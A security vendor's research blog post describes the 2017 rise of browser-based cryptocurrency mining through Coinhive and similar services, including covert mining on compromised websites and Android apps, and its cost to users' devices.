Blogs > Security Research > Web-services monetization driven by crypto currency mining in websites and mobile apps

Web-services monetization driven by crypto currency mining in websites and mobile apps

A new era of crypto currency mining via websites and mobile apps

By: Manohar Ghule

 

A paradigm shift has been observed since last month in website monetization techniques. Website monetization is the process of converting traffic sent to a website into revenue. "Pay-Per-Click" Advertising, "Selling Ad Space", "Affiliate Marketing" and "Donations" are the most common practices used for monetizing a website. The idea of mining crypto-currency on a user's browser to monetize a website was introduced by a company called Coinhive. Coinhive provides a JavaScript library that can be invoked within a loaded webpage to start mining for cryptocurrency called Moneros (XMR) as an alternative source of revenue. As a service fee Coinhive keeps 30% of earned XMR and 70% share is given to site owner. As a result, the user gets an ad free experience on the webpage at the cost of some CPU cycles, the website owner earns 70% and the mining-service provider gets 30% of the generated XMR: appears to be Win-Win for everyone.

 

This new  website monetization tactic has attracted much attention. Torrent sites like "The Pirate Bay," as well as certain porn sites, have quickly adopted it. Also, similar service providers such as Crypto-loot, CoinBlind, CoinNebula, MineMyTraffic, Jsecoin, Coin-Have, PPoi and Adsencebase have emerged.

In the month of October, we found around 2K unique domains that had embedded coin mining JavaScript and ~20K unique URLs churning CPUs of users to generate revenue.

 

Fig 1: Daily unique webpage hit count  in Oct-17.

 

Fig 2: Geo-location of hosts/websites those adopted in-browser mining.

 

Fig 3: Geo-location of clients who accessed mining websites.

 

The more time a user spends on the site the more revenue will be generated. Websites providing video streaming and file-sharing services tend to benefit more from in-browser mining. As a result, we are seeing more hits on these types of websites. In addition to  voluntarily deploying mining, we have also noticed that mining has been deployed on compromised sites too – giving the bad guys one more vector that can be abused for financial gain.

 

Fig 4: Top-100 sites based on number of hits.

 

As traditional website monetization has introduced risks of personal data theft through adware and malvertisements, browser mining has similarly opened the door for new types of threats.

From a security perspective, crypto-currency mining inside browsers is not malicious by itself. However, we observed that this practice is being carried out silently without end user’s consent and knowledge, which makes it undesirable. Cyber criminals are injecting mining script in compromised websites which secretly consume CPU cycles of a user's laptop or mobile device to mine cryptocurrency when the user visit the website. This is a resource-hijack attack where there is no immediate way to tell that a webpage is consuming CPUs. However, one site performing mining is likely to bring poor experience on the websites open in other tabs. Moreover, multiple webpages will drain the CPU if it performs mining parallelly in different tabs. When these kind of miners are in action, a user will find the computer or the mobile device  running slower and the CPU temperature will rise causing mobiles to overheat, which may damage or reduce the life of the device. Additionally, this could result in increased electricity bill for users.

 

Fig 5: CPU Usage in normal conditions.

 

Fig 6: CPU Usage when mining started.

 

Fig 7: Source code of webpage embedded mining script.

 

JavaScript Miners for Mobile

The phenomenon of in-browser JavaScript based cryptocurrency mining has made its way to Android applications on the Google Play Store too. Researchers found some apps which are using Coinhive’s service without any notification to the user. When an app with the cryptocurrency miner is opened, it will start consuming resources, leading to reduced battery life and slower performance of device.

Fig 8: Snapshot of JavaScript code used for mining in an app.

 

One can argue that in-browser mining is a neat and clean alternative for pop-ups and banner ads because ads are annoying and have their own privacy and security concerns. On other hand, consuming user’s resources without their consent makes this practice precarious. In our findings, we observed that none of mining services prompted the user or provided an opt-out option. Therefore, we are blocking such webpages. In a response to security concerns on illegitimate mining, Coinhive has also introduced a JavaScript library that provides opt-out option to users.

 




Suggested Blogs